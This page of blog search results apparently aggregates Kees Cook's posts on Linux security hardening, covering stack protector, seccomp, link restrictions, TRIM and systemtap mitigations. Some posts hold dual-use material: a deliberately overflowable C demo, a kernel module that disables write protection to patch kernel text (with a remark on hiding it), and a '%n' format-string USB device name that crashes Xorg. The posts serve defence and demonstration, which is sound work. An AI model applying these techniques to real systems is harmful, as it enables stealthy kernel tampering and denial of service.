Search Results: "kees"

27 January 2014

Kees Cook: -fstack-protector-strong

There will be a new option in gcc 4.9 named -fstack-protector-strong, which offers an improved version of -fstack-protector without going all the way to -fstack-protector-all. The stack protector feature itself adds a known canary to the stack during the function preamble, and checks it when the function returns. If it changed, there was a stack overflow, and the program aborts.

This is fine, but figuring out when to include it is the reason behind the various options. Since traditionally stack overflows happen with string-based manipulations, the default (-fstack-protector) only includes the canary code when a function defines a local character array of 8 or more bytes (--param=ssp-buffer-size=N, N=8 by default). This means just a few functions get the checking, but they're probably the most likely to need it, so it's an okay balance. Various distributions ended up lowering their default --param=ssp-buffer-size option down to 4, since there were still cases of functions that should have been protected but the conservative gcc upstream default of 8 wasn't covering them.

However, even with the increased function coverage, there are rare cases when a stack overflow happens on other kinds of stack variables. To handle this more paranoid concern, -fstack-protector-all was defined to add the canary to all functions. This results in substantial use of stack space for saving the canary on deep stack users, and a measurable (though surprisingly still relatively low) performance hit due to all the saving/checking. For a long time, Chrome OS used this, since we're paranoid. :)

In the interest of gaining back some of the lost performance and not hitting our Chrome OS build images with such a giant stack-protector hammer, Han Shen from the Chrome OS compiler team created the new option -fstack-protector-strong, which enables the canary in many more conditions (per the GCC documentation: functions with local array definitions of any type, or with references to local frame addresses). This meant we were covering all the more paranoid conditions that might lead to a stack overflow. Chrome OS has been using this option instead of -fstack-protector-all for about 10 months now.

As a quick demonstration of the options, you can see this example program under various conditions. It tries to show off an example of shoving serialized data into a non-character variable, like might happen in some network address manipulations or streaming data parsing. Since I'm using memcpy here for clarity, the builds will need to turn off FORTIFY_SOURCE, which would also notice the overflow.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
struct no_chars {
    unsigned int len;
    unsigned int data;
};
int main(int argc, char * argv[])
{
    struct no_chars info = { };
    if (argc < 3) {
        fprintf(stderr, "Usage: %s LENGTH DATA...\n", argv[0]);
        return 1;
    }
    info.len = atoi(argv[1]);
    memcpy(&info.data, argv[2], info.len);
    return 0;
}
Built with everything disabled, this faults trying to return to an invalid VMA. Built with FORTIFY_SOURCE enabled, we see the expected catch of the overflow in memcpy, so we'll leave FORTIFY_SOURCE disabled for our comparisons. With pre-4.9 gcc, -fstack-protector does not get triggered to protect this function; -fstack-protector-all, however, does trigger the protection, as expected; and with the gcc snapshot of 4.9, -fstack-protector-strong does its job as well.

For Linux 3.14, I've added support for -fstack-protector-strong via the new CONFIG_CC_STACKPROTECTOR_STRONG option. The old CONFIG_CC_STACKPROTECTOR will be available as CONFIG_CC_STACKPROTECTOR_REGULAR. When comparing the results of builds via size and objdump -d analysis, here's what I found with gcc 4.9: a normal x86_64 defconfig build, without stack protector, had a kernel text size of 11430641 bytes with 36110 function bodies. Adding CONFIG_CC_STACKPROTECTOR_REGULAR increased the kernel text size to 11468490 bytes (a +0.33% change), with 1015 of 36110 functions stack-protected (2.81%). Using CONFIG_CC_STACKPROTECTOR_STRONG increased the kernel text size to 11692790 bytes (+2.24%), with 7401 of 36110 functions stack-protected (20.5%). And 20% is a far cry from the 100% we'd get if support for -fstack-protector-all were added back to the kernel.

The next bit of work will be figuring out the best way to detect the version of gcc in use when doing Debian package builds, and using -fstack-protector-strong instead of -fstack-protector. For Ubuntu, it's much simpler because it'll just be the compiler default.
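Pulling the narrated builds together, the matrix looks roughly like the following sketch (the flags are the real ones discussed above; the output binary names, the gcc-4.9 command spelling, and the sample run are my own illustration):
gcc -O2 -U_FORTIFY_SOURCE -fno-stack-protector -o everything-off example.c
gcc -O2 -D_FORTIFY_SOURCE=2 -fno-stack-protector -o fortify example.c
gcc -O2 -U_FORTIFY_SOURCE -fstack-protector -o protector example.c
gcc -O2 -U_FORTIFY_SOURCE -fstack-protector-all -o protector-all example.c
gcc-4.9 -O2 -U_FORTIFY_SOURCE -fstack-protector-strong -o protector-strong example.c
# e.g. trigger the overflow; the protected builds abort via the canary check:
./protector-strong 100 $(perl -e 'print "A" x 100')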

2014, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

21 December 2013

Kees Cook: DOM scraping

For a long time now I've used mechanize (via either Perl or Python) for doing website interaction automation. Stuff like playing web games, checking the weather, or reviewing my balance at the bank. However, as the use of javascript continues to increase, it's getting harder and harder to screen-scrape without actually processing DOM events. To do that, really only browsers are doing the right thing, so getting attached to an actual browser DOM is generally the only way to do any kind of web interaction automation. It seems the thing furthest along this path is Selenium. Initially, I spent some time trying to make it work with Firefox, but gave up. Instead, this seems to work nicely with Chrome via the Chrome WebDriver. And even better, all of this works out of the box on Ubuntu 13.10 via python-selenium and chromium-chromedriver.

Running /usr/lib/chromium-browser/chromedriver2_server from chromium-chromedriver starts a network listener on port 9515. This is the WebDriver API that Selenium can talk to. When requests are made, chromedriver2_server spawns Chrome, and all the interactions happen against that browser. Since I prefer Python, I avoided the Java interfaces and focused on the Python bindings:
#!/usr/bin/env python
import sys
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.common.keys import Keys
caps = webdriver.DesiredCapabilities.CHROME
browser = webdriver.Remote("http://localhost:9515", caps)
browser.get("https://bank.example.com/")
assert "My Bank" in browser.title
try:
    elem = browser.find_element_by_name("userid")
    elem.send_keys("username")
    elem = browser.find_element_by_name("password")
    elem.send_keys("wheee my password" + Keys.RETURN)
except NoSuchElementException:
    print "Could not find login elements"
    sys.exit(1)
assert "Account Balances" in browser.title
xpath = "//div[text()='Balance']/../../td[2]/div[contains(text(),'$')]"
balance = browser.find_element_by_xpath(xpath).text
print balance
browser.close()
This would work pretty great, but if you need to save any state between sessions, you'll want to be able to change where Chrome stores data (since by default in this configuration, it uses an empty temporary directory via --user-data-dir=). Happily, various things about the browser environment can be controlled, including the command line arguments. This is configurable by expanding the desired capabilities variable:
caps = webdriver.DesiredCapabilities.CHROME
caps["chromeOptions"] =  
        "args": ["--user-data-dir=/home/user/somewhere/to/store/your/session"],
     
A great thing about this is that you get to actually watch the browser do its work. However, in cases where this interaction is going to be fully automated, you likely won't have a Xorg session running, so you'll need to wrap the WebDriver in one (since it launches Chrome). I used Xvfb for this:
#!/bin/bash
# Start WebDriver under fake X and wait for it to be listening
xvfb-run /usr/lib/chromium-browser/chromedriver2_server &
pid=$!
while ! nc -q0 -w0 localhost 9515; do
    sleep 1
done
the-chrome-script
rc=$?
# Shut down WebDriver
kill $pid
exit $rc
Alternatively, all of this could be done in the python script too, but I figured it's easier to keep the support infrastructure separate from the actual test script itself. I actually leave the xvfb-run call external too, so it's easier to debug the browser in my own X session. One bug I encountered was that the WebDriver's cache of the browser's DOM can sometimes get out of sync with the actual browser's DOM. I didn't find a solution to this, but managed to work around it. I'm hoping later versions fix this. :)
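The post doesn't say what the workaround was, but the usual shape of one is a re-find-and-retry loop; a sketch (the helper name is mine; StaleElementReferenceException is the exception selenium raises for this):
import time
from selenium.common.exceptions import StaleElementReferenceException

def text_with_retry(browser, xpath, attempts=5):
    # Re-find the element on each attempt; it is the cached element
    # reference that goes stale, not the browser's actual DOM.
    for _ in range(attempts):
        try:
            return browser.find_element_by_xpath(xpath).text
        except StaleElementReferenceException:
            time.sleep(1)
    raise RuntimeError("element stayed stale: %s" % xpath)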

2013, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

10 December 2013

Kees Cook: live patching the kernel

A nice set of recent posts have done a great job detailing the remaining ways that a root user can get at kernel memory. Part of this is driven by the ideas behind UEFI Secure Boot, but they come from the same goal: making sure that the root user cannot directly subvert the running kernel. My perspective on this is toward making sure that an attacker who has gained access and then gained root privileges can't continue to elevate their access and install invisible kernel rootkits.

An outline of possible attack vectors is spelled out by Matthew Garrett's continuing, useful kernel lockdown patch series. The set of attacks was examined by Tyler Borland in "Bypassing modules_disabled security". His post describes each vector in detail, and he ultimately chooses MSR writing as the way to write kernel memory (and shows an example of how to re-enable module loading). One thing not mentioned is that many distros have MSR access as a module, and it's rarely loaded. If modules_disabled is already set, an attacker won't be able to load the MSR module to begin with. However, the other general-purpose vector, kexec, is still available. To prove out this method, Matthew wrote a proof-of-concept for changing kernel memory via kexec.

Chrome OS is several steps ahead here, since it has hibernation disabled, MSR writing disabled, kexec disabled, modules verified, root filesystem read-only and verified, kernel verified, and firmware verified. But since not all my machines are Chrome OS, I wanted to look at some additional protections against kexec on general-purpose distro kernels that have CONFIG_KEXEC enabled, especially those without UEFI Secure Boot and Matthew's lockdown patch series. My goal was to disable kexec without needing to rebuild my entire kernel. For future kernels, I have proposed adding /proc/sys/kernel/kexec_disabled, a partner to the existing modules_disabled, that will one-way toggle kexec off. For existing kernels, things got more ugly.

What options do I have for patching a running kernel? First I looked back at what I'd done in the past with fixing vulnerabilities with systemtap. This ends up being a rather heavy-duty way to go about things, since you need all the distro kernel debug symbols, etc. It does work, but has a significant problem: since it uses kprobes, a root user can just turn off the probes, reverting the changes. So that's not going to work. Next I looked at ksplice. The original upstream has gone away, but there is still some work being done by Jiri Slaby. However, even with his updates, which fixed various build problems, there were still more, even when building a 3.2 kernel (Ubuntu 12.04 LTS). So that's out too, which is too bad, since ksplice does exactly what I want: modifies the running kernel's functions via a module.

So, finally, I decided to just do it by hand, and wrote a friendly kernel rootkit. Instead of dealing with flipping page table permissions on the normally-unwritable kernel code memory, I borrowed from PaX's KERNEXEC feature, and just turn off write protect checking on the CPU briefly to make the changes. The return values for functions on x86_64 are stored in RAX, so I just need to stuff the kexec_load syscall with "mov $-1, %rax; ret" (-1 is EPERM):
#define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
#include <linux/init.h>
#include <linux/module.h>
#include <linux/slab.h>
static unsigned long long_target;
static char *target;
module_param_named(syscall, long_target, ulong, 0644);
MODULE_PARM_DESC(syscall, "Address of syscall");
/* mov $-1, %rax; ret */
unsigned const char bytes[] = { 0x48, 0xc7, 0xc0, 0xff, 0xff, 0xff, 0xff,
                                0xc3 };
unsigned char *orig;
/* Borrowed from PaX KERNEXEC */
static inline void disable_wp(void)
{
        unsigned long cr0;
        preempt_disable();
        barrier();
        cr0 = read_cr0();
        cr0 &= ~X86_CR0_WP;
        write_cr0(cr0);
}
static inline void enable_wp(void)
{
        unsigned long cr0;
        cr0 = read_cr0();
        cr0 |= X86_CR0_WP;
        write_cr0(cr0);
        barrier();
        preempt_enable_no_resched();
}
static int __init syscall_eperm_init(void)
{
        int i;
        target = (char *)long_target;
        if (target == NULL)
                return -EINVAL;
        /* save original */
        orig = kmalloc(sizeof(bytes), GFP_KERNEL);
        if (!orig)
                return -ENOMEM;
        for (i = 0; i < sizeof(bytes); i++) {
                orig[i] = target[i];
        }
        pr_info("writing %lu bytes at %p\n", sizeof(bytes), target);
        disable_wp();
        for (i = 0; i < sizeof(bytes); i++) {
                target[i] = bytes[i];
        }
        enable_wp();
        return 0;
}
module_init(syscall_eperm_init);
static void __exit syscall_eperm_exit(void)
{
        int i;
        pr_info("restoring %lu bytes at %p\n", sizeof(bytes), target);
        disable_wp();
        for (i = 0; i < sizeof(bytes); i++) {
                target[i] = orig[i];
        }
        enable_wp();
        kfree(orig);
}
module_exit(syscall_eperm_exit);
MODULE_LICENSE("GPL");
MODULE_AUTHOR("Kees Cook <kees@outflux.net>");
MODULE_DESCRIPTION("makes target syscall always return EPERM");
If I didn't want to leave an obvious indication that the kernel had been manipulated, the module could be changed further (dropping the pr_info() calls, for example). And with this in place, it's just a matter of loading it with the address of sys_kexec_load (found via /proc/kallsyms) before I disable module loading via modprobe. Here's my upstart script:
# modules-disable - disable modules after rc scripts are done
#
description "disable loading modules"
start on stopped module-init-tools and stopped rc
task
script
        cd /root/modules/syscall_eperm
        make clean
        make
        insmod ./syscall_eperm.ko \
                syscall=0x$(egrep ' T sys_kexec_load$' /proc/kallsyms | cut -d" " -f1)
        modprobe disable
end script
And now I'm safe from kexec before I have a kernel that contains /proc/sys/kernel/kexec_disabled.
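To convince yourself the patch took, a tiny test of my own (not from the original post) that calls the now-stubbed syscall directly; run it as root, since unprivileged callers would get EPERM from the capability check regardless:
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <sys/syscall.h>
#include <unistd.h>

int main(void)
{
        /* Bogus arguments; we only care whether the stub returns EPERM. */
        long ret = syscall(SYS_kexec_load, 0UL, 0UL, NULL, 0UL);
        if (ret < 0 && errno == EPERM)
                printf("kexec_load: EPERM, patch is live\n");
        else
                printf("kexec_load not blocked (ret=%ld errno=%d)\n", ret, errno);
        return 0;
}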

2013, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

27 November 2013

Kees Cook: Thanks UPS

My UPS has decided that every two weeks, when it performs a self-test, my 116V mains power isn't good enough, so it drains the battery and shuts down my home network. It only took a month and a half for me to see on the network graphs that my outages were, to the minute, 2 weeks apart. :)
[Graph: APC monitoring]
In theory, reducing the sensitivity will fix this.

2013, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

13 August 2013

Kees Cook: TPM providing /dev/hwrng

A while ago, I added support for the TPM's pRNG to the rng-tools package in Ubuntu. Since then, Kent Yoder added TPM support directly into the kernel's /dev/hwrng device. This means there's no need to carry the patch in rng-tools any more, since I can use /dev/hwrng directly now:
# modprobe tpm-rng
# echo tpm-rng >> /etc/modules
# grep -v ^# /etc/default/rng-tools
RNGDOPTIONS="--fill-watermark=90%"
# service rng-tools restart
And as before, once it's been running a while (or you send SIGUSR1 to rngd), you can see reporting in syslog:
# pkill -USR1 rngd
# tail -n 15 /var/log/syslog
Aug 13 09:51:01 linux rngd[39114]: stats: bits received from HRNG source: 260064
Aug 13 09:51:01 linux rngd[39114]: stats: bits sent to kernel pool: 216384
Aug 13 09:51:01 linux rngd[39114]: stats: entropy added to kernel pool: 216384
Aug 13 09:51:01 linux rngd[39114]: stats: FIPS 140-2 successes: 13
Aug 13 09:51:01 linux rngd[39114]: stats: FIPS 140-2 failures: 0
Aug 13 09:51:01 linux rngd[39114]: stats: FIPS 140-2(2001-10-10) Monobit: 0
Aug 13 09:51:01 linux rngd[39114]: stats: FIPS 140-2(2001-10-10) Poker: 0
Aug 13 09:51:01 linux rngd[39114]: stats: FIPS 140-2(2001-10-10) Runs: 0
Aug 13 09:51:01 linux rngd[39114]: stats: FIPS 140-2(2001-10-10) Long run: 0
Aug 13 09:51:01 linux rngd[39114]: stats: FIPS 140-2(2001-10-10) Continuous run: 0
Aug 13 09:51:01 linux rngd[39114]: stats: HRNG source speed: (min=10.433; avg=10.442; max=10.454)Kibits/s
Aug 13 09:51:01 linux rngd[39114]: stats: FIPS tests speed: (min=73.360; avg=75.504; max=86.305)Mibits/s
Aug 13 09:51:01 linux rngd[39114]: stats: Lowest ready-buffers level: 2
Aug 13 09:51:01 linux rngd[39114]: stats: Entropy starvations: 0
Aug 13 09:51:01 linux rngd[39114]: stats: Time spent starving for entropy: (min=0; avg=0.000; max=0)us
I'm pondering getting this running in Chrome OS too, but I want to make sure it doesn't suck too much battery.
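As a sanity-check that /dev/hwrng is actually backed by the TPM, the kernel's hw_random sysfs interface can be queried; the tpm-rng output shown here is what I'd expect with the module loaded, not output captured from the original post:
# cat /sys/class/misc/hw_random/rng_current
tpm-rng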

2013, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

1 October 2012

Kees Cook: Link restrictions released in Linux 3.6

It's been a very long time coming, but symlink and hardlink restrictions have finally landed in the mainline Linux kernel as of version 3.6. The protection is at least old enough to have a driver's license in most US states, with some of the first discussions I could find dating from August 1996. While this protection is old (to ancient) news for anyone running Chrome OS, Ubuntu, grsecurity, or Openwall, I'm extremely excited that it can now benefit everyone running Linux. All the way from cloud monstrosities to cell phones, an entire class of vulnerability just goes away. Thanks to everyone that had a part in developing, testing, reviewing, and encouraging these changes over the years. It's quite a relief to have it finally done. I hope I never have to include the year in my patch revision serial number again. :)
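The restrictions landed as a pair of sysctls. Whether they are on by default depends on the kernel configuration and your distro, so it's worth checking; a sketch, with the values shown being the enabled state:
# sysctl fs.protected_symlinks fs.protected_hardlinks
fs.protected_symlinks = 1
fs.protected_hardlinks = 1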

2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

16 May 2012

Kees Cook: USB AVR fun

At the recent Ubuntu Developer Summit, I managed to convince a few people (after assurances that there would be no permanent damage) to plug a USB stick into their machines so we could watch Xorg crash and wedge their console. What was this evil thing, you ask? It was an AVR microprocessor connected to USB, acting as a USB HID Keyboard, with the product name set to "%n". Recently a Chrome OS developer discovered that renaming his Bluetooth keyboard to "%n" would crash Xorg. The flaw was in the logging stack, triggering glibc to abort the process due to format string protections. At first glance, it looks like this isn't a big deal since one would have to have already done a Bluetooth pairing with the keyboard, but it would be a problem for any input device, not just Bluetooth. I wanted to see this in action for a normal (USB) keyboard. I borrowed a Maximus USB AVR from a friend, and then ultimately bought a Minimus. It will let you put anything you want on the USB bus. I added a rule for it to udev:
SUBSYSTEM=="usb", ACTION=="add", ATTR idVendor =="03eb", ATTR idProduct =="*", GROUP="plugdev"
installed the AVR tools:
sudo apt-get install dfu-programmer gcc-avr avr-libc
and pulled down the excellent LUFA USB tree:
git clone git://github.com/abcminiuser/lufa-lib.git
After applying a patch to the LUFA USB keyboard demo, I had my handy USB-AVR-as-Keyboard stick ready to crash Xorg:
-       .VendorID               = 0x03EB,
-       .ProductID              = 0x2042,
+       .VendorID               = 0x045e,
+       .ProductID              = 0x000b,
...
-       .UnicodeString          = L"LUFA Keyboard Demo"
+       .UnicodeString          = L"Keyboard (%n%n%n%n)"
In fact, it was so successful that after I got the code right and programmed it, Xorg immediately crashed on my development machine. :)
make dfu
After a reboot, I switched it back to programming mode by pressing and holding the "H" button, press/releasing the "R" button, and then releasing "H". The fix to Xorg is winding its way through upstream, and should land in your distros soon. In the meantime, you can disable your external USB ports, as Marc Deslauriers demonstrated for me:
echo "0" > /sys/bus/usb/devices/usb1/authorized
echo "0" > /sys/bus/usb/devices/usb1/authorized_default
Be careful of shared internal/external ports, and having two buses on one port, etc.
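To undo this later, the same files accept a "1" (note that authorized_default only affects devices connected afterwards):
echo "1" > /sys/bus/usb/devices/usb1/authorized
echo "1" > /sys/bus/usb/devices/usb1/authorized_default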

2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

26 March 2012

Kees Cook: keeping your process unprivileged

One of the prerequisites for seccomp filter is the new PR_SET_NO_NEW_PRIVS prctl from Andy Lutomirski. If you're not interested in digging into creating a seccomp filter for your program, but you know your program should be effectively a leaf node in the process tree, you can call PR_SET_NO_NEW_PRIVS ("nnp") to make sure that the current process and its children cannot gain new privileges (like through running a setuid binary). This produces some fun results, since things like the ping tool expect to gain enough privileges to open a raw socket. If you set nnp to 1, suddenly that can't happen any more. Here's a quick example that sets nnp, and tries to run the command line arguments:
#include <stdio.h>
#include <unistd.h>
#include <sys/prctl.h>
#ifndef PR_SET_NO_NEW_PRIVS
# define PR_SET_NO_NEW_PRIVS 38
#endif
int main(int argc, char * argv[])
{
        if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)) {
                perror("prctl(NO_NEW_PRIVS)");
                return 1;
        }
        return execvp(argv[1], &argv[1]);
}
When it tries to run ping, the setuid-ness just gets ignored:
$ gcc -Wall nnp.c -o nnp
$ ./nnp ping -c1 localhost
ping: icmp open socket: Operation not permitted
So, if your program has all the privs it's going to need, consider using nnp to keep it from being a potential gateway to more trouble. Hopefully we can ship something like this trivial nnp helper as part of coreutils or similar, like nohup, nice, etc.

2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

23 March 2012

Kees Cook: seccomp filter now in Ubuntu

With the generous help of the Ubuntu kernel team, Will Drewry's seccomp filter code has landed in Ubuntu 12.04 LTS in time for Beta 2, and will be in Chrome OS shortly. Hopefully this will be in upstream soon, and filter (pun intended) to the rest of the distributions quickly. One of the questions I've been asked by several people while they developed policy for earlier "mode 2" seccomp implementations was "How do I figure out which syscalls my program is going to need?" To help answer this question, and to show a simple use of seccomp filter, I've written up a little tutorial that walks through several steps of building a seccomp filter. It includes a header file (seccomp-bpf.h) for implementing the filter, and a collection of other files used to assist in syscall discovery. It should be portable, so it can build even on systems that do not have seccomp available yet. Read more in the seccomp filter tutorial. Enjoy!
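The tutorial has the full walk-through; as a taste of what a minimal mode 2 filter looks like when installed by hand, here is a sketch of my own (not code from the tutorial): it assumes kernel headers new enough to define struct seccomp_data, and a real filter must also validate the architecture field before trusting syscall numbers:
#include <stddef.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
#ifndef PR_SET_NO_NEW_PRIVS
# define PR_SET_NO_NEW_PRIVS 38
#endif

int main(void)
{
        struct sock_filter filter[] = {
                /* Load the syscall number. (A real filter must first check
                 * seccomp_data->arch before trusting this value.) */
                BPF_STMT(BPF_LD | BPF_W | BPF_ABS,
                         offsetof(struct seccomp_data, nr)),
                /* Allow a tiny whitelist; kill the process on anything else. */
                BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_write, 3, 0),
                BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_exit_group, 2, 0),
                BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_exit, 1, 0),
                BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL),
                BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
        };
        struct sock_fprog prog = {
                .len = sizeof(filter) / sizeof(filter[0]),
                .filter = filter,
        };
        /* nnp is required for unprivileged processes to install a filter. */
        if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0))
                return 1;
        if (prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog))
                return 1;
        write(STDOUT_FILENO, "filtered!\n", 10);
        return 0; /* exits via exit_group(), which is on the whitelist */
}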

2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

15 February 2012

Kees Cook: discard, hole-punching, and TRIM

Under Linux, there are a number of related features around marking areas of a file, filesystem, or block device as "no longer allocated". In the standard view, here's what happens if you fill a file to 500M and then truncate it to 100M, using the truncate syscall:
  1. create the empty file, filesystem allocates an inode, writes accounting details to block device.
  2. write data to file, filesystem allocates and fills data blocks, writes blocks to block device.
  3. truncate the file to a smaller size, filesystem updates accounting details and releases blocks, writes accounting details to block device.
The important thing to note here is that in step 3 the block device has no idea about the released data blocks. The original contents of the file are actually still on the device. (And to a certain extent, that is why programs like shred exist.) While the recoverability of such released data is a whole other issue, the main problem with this lack of information for the block device is that some devices (like SSDs) could use the information to their benefit, to help with extending their life, etc. To support this, the TRIM set of commands was created so that a block device could be informed when blocks are released. Under Linux, this is handled by the block device driver, and what the filesystem can pass down is "discard" intent, which is translated into the needed TRIM commands. So now, when discard notification is enabled for a filesystem (e.g. the "discard" mount option for ext4), the earlier example looks like this:
  1. create the empty file, filesystem allocates an inode, writes accounting details to block device.
  2. write data to file, filesystem allocates and fills data blocks, writes blocks to block device.
  3. truncate the file to a smaller size, filesystem updates accounting details and releases blocks, writes accounting details and sends discard intent to block device.
While SSDs can use discard to do fancy SSD things, there's another great use for discard, which is to restore sparseness to files. Normally, if you create a sparse file (open, seek to size, close), there was no way, after writing data to this file, to punch a hole back into it. The best that could be done was to just write zeros over the area, but that took up filesystem space. So, the ability to punch holes in files was added via the FALLOC_FL_PUNCH_HOLE option of fallocate. And when discard is enabled for a filesystem, these punched holes get passed down to the block device as well.

Take, for example, a qemu/KVM VM running on a disk image built from a sparse file. Inside the VM instance, the disk appears to be 10G. Externally, it might only have actually allocated 600M, since those are the only blocks that have been allocated so far. If, in the instance, you wrote 8G worth of temporary data and then deleted it, the underlying sparse file would have ballooned by 8G and stayed ballooned. With discard and hole punching, it's now possible for the filesystem in the VM to issue discards to the block driver, and then qemu can issue hole-punching requests to the sparse file backing the image, and all of that 8G gets freed again. The only downside is that each layer needs to correctly translate the requests into what the next layer needs.

With Linux 3.1, dm-crypt supports passing discards from the filesystem above down to the block device under it (though this has cryptographic risks, so it is disabled by default). With Linux 3.2, the loopback block driver supports receiving discards and passing them down as hole-punches. That means that a stack like this works now: ext4, on dm-crypt, on loopback of a sparse file, on ext4, on an SSD. If a file is deleted at the top, it'll pass all the way down, discarding allocated blocks all the way to the SSD.

Set up a sparse backing file, loopback mount it, and create a dm-crypt device (with allow_discards) on it:
# cd /root
# truncate -s10G test.block
# ls -lk test.block
-rw-r--r-- 1 root root 10485760 Feb 15 12:36 test.block
# du -sk test.block
0       test.block
# DEV=$(losetup -f --show /root/test.block)
# echo $DEV
/dev/loop0
# SIZE=$(blockdev --getsz $DEV)
# echo $SIZE
20971520
# KEY=$(echo -n "my secret passphrase" | sha256sum | awk '{print $1}')
# echo $KEY
a7e845b0854294da9aa743b807cb67b19647c1195ea8120369f3d12c70468f29
# dmsetup create testenc --table "0 $SIZE crypt aes-cbc-essiv:sha256 $KEY 0 $DEV 0 1 allow_discards"
Now build an ext4 filesystem on it, and mount it with the discard option. This enables discard during mkfs, and disables lazy initialization so we can see the final size of the used space on the backing file without waiting for the background initialization at mount-time to finish:
# mkfs.ext4 -E discard,lazy_itable_init=0,lazy_journal_init=0 /dev/mapper/testenc
mke2fs 1.42-WIP (16-Oct-2011)
Discarding device blocks: done
Filesystem label=
OS type: Linux
Block size=4096 (log=2)
Fragment size=4096 (log=2)
Stride=0 blocks, Stripe width=0 blocks
655360 inodes, 2621440 blocks
131072 blocks (5.00%) reserved for the super user
First data block=0
Maximum filesystem blocks=2684354560
80 block groups
32768 blocks per group, 32768 fragments per group
8192 inodes per group
Superblock backups stored on blocks:
        32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632
Allocating group tables: done
Writing inode tables: done
Creating journal (32768 blocks): done
Writing superblocks and filesystem accounting information: done 
# mount -o discard /dev/mapper/testenc /mnt
# sync; du -sk test.block
297708  test.block
Now, we create a 200M file, examine the backing file allocation, remove it, and compare the results:
# dd if=/dev/zero of=/mnt/blob bs=1M count=200
200+0 records in
200+0 records out
209715200 bytes (210 MB) copied, 9.92789 s, 21.1 MB/s
# sync; du -sk test.block
502524  test.block
# rm /mnt/blob
# sync; du -sk test.block
297720  test.block
Nearly all the space was reclaimed after the file was deleted. Yay! Note that the Linux tmpfs filesystem does not yet support hole punching, so the example above wouldn't work if you tried it in a tmpfs-backed filesystem (e.g. /tmp on many systems).
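For completeness, punching a hole from C looks something like this sketch (the offset and length are arbitrary for illustration, and should be block-aligned for blocks to actually be released):
#define _GNU_SOURCE
#include <fcntl.h>
#include <linux/falloc.h>
#include <stdio.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
        int fd;
        if (argc < 2) {
                fprintf(stderr, "Usage: %s FILE\n", argv[0]);
                return 1;
        }
        fd = open(argv[1], O_WRONLY);
        if (fd < 0) {
                perror("open");
                return 1;
        }
        /* KEEP_SIZE is mandatory with PUNCH_HOLE: the file length stays
         * the same; the punched range just reads back as zeros. */
        if (fallocate(fd, FALLOC_FL_PUNCH_HOLE | FALLOC_FL_KEEP_SIZE,
                      4096, 64 * 4096) < 0) {
                perror("fallocate");
                return 1;
        }
        return close(fd);
}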

2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

10 February 2012

Kees Cook: kvm and product_uuid

While looking for something to use as a system-unique fall-back when a TPM is not available, I looked at /sys/devices/virtual/dmi/id/product_uuid (the same as dmidecode's "System Information / UUID"), but was disappointed when, under KVM, the file was missing (and running dmidecode crashes KVM *cough*). However, after a quick check, I noticed that KVM supports the -uuid option to set the value of /sys/devices/virtual/dmi/id/product_uuid. Looks like libvirt supports this under capabilities / host / uuid in the XML, too.
host# kvm -uuid 12345678-ABCD-1234-ABCD-1234567890AB ...
host# ssh localhost ...
...
guest# cat /sys/devices/virtual/dmi/id/product_uuid
12345678-ABCD-1234-ABCD-1234567890AB

2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

22 January 2012

Kees Cook: fixing vulnerabilities with systemtap

Recently the upstream Linux kernel released a fix for a serious security vulnerability (CVE-2012-0056) without coordinating with Linux distributions, leaving a window of vulnerability open for end users. Luckily, the exposure was not as bad as it could have been, but it's still a cross-architecture local root escalation on most common installations. Don't stop reading just because you don't have a local user base: attackers can use this to elevate privileges from your user, or from the web server's user, etc. Since there is now a nearly-complete walk-through, the urgency for fixing this is higher. While you're waiting for your distribution's kernel update, you can use systemtap to change your kernel's running behavior. RedHat suggested this, and the same approach works in Debian and Ubuntu. In this case, the systemtap script changes the argument containing the size of the write to zero bytes ($count = 0), which effectively closes this vulnerability. UPDATE: here's a systemtap script from Soren that doesn't require the full debug symbols. Sneaky, but it can be rather slow since it hooks all writes in the system. :)
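The script itself was lost from this copy of the post; the published mitigation was essentially a guru-mode one-liner along these lines (my reconstruction: the probe point is the /proc/<pid>/mem write handler at issue in CVE-2012-0056):
# Run with: stap -g this-script.stp
# The trailing "?" makes the probe optional, in case mem_write is unavailable.
probe kernel.function("mem_write").call ? {
        $count = 0  # force every /proc/<pid>/mem write to be 0 bytes long
}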

2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

16 January 2012

Rapha&#235;l Hertzog: Review of my Debian related goals for 2011

Last year I shared my Debian related goals for 2011. I tend to put up more goals than I can reasonably complete alone, and this year was no exception. Let's have a look.
  1. Translate my Debian book into English: PARTLY DONE
    It took more time than expected to prepare and to run the fundraising campaign but it has been successful and the translation is happening right now.
  2. Finish multiarch support in dpkg: DONE BUT NOT ENTIRELY MERGED YET
    Yes, multiarch support was already in the pipe last year in January. I completed the development between January and April (it was sponsored by Linaro) and since then it has mostly been waiting on Guillem to review it, tweak it, and integrate it.
  3. Make deb files use XZ compression by default: TRIED BUT ABANDONED
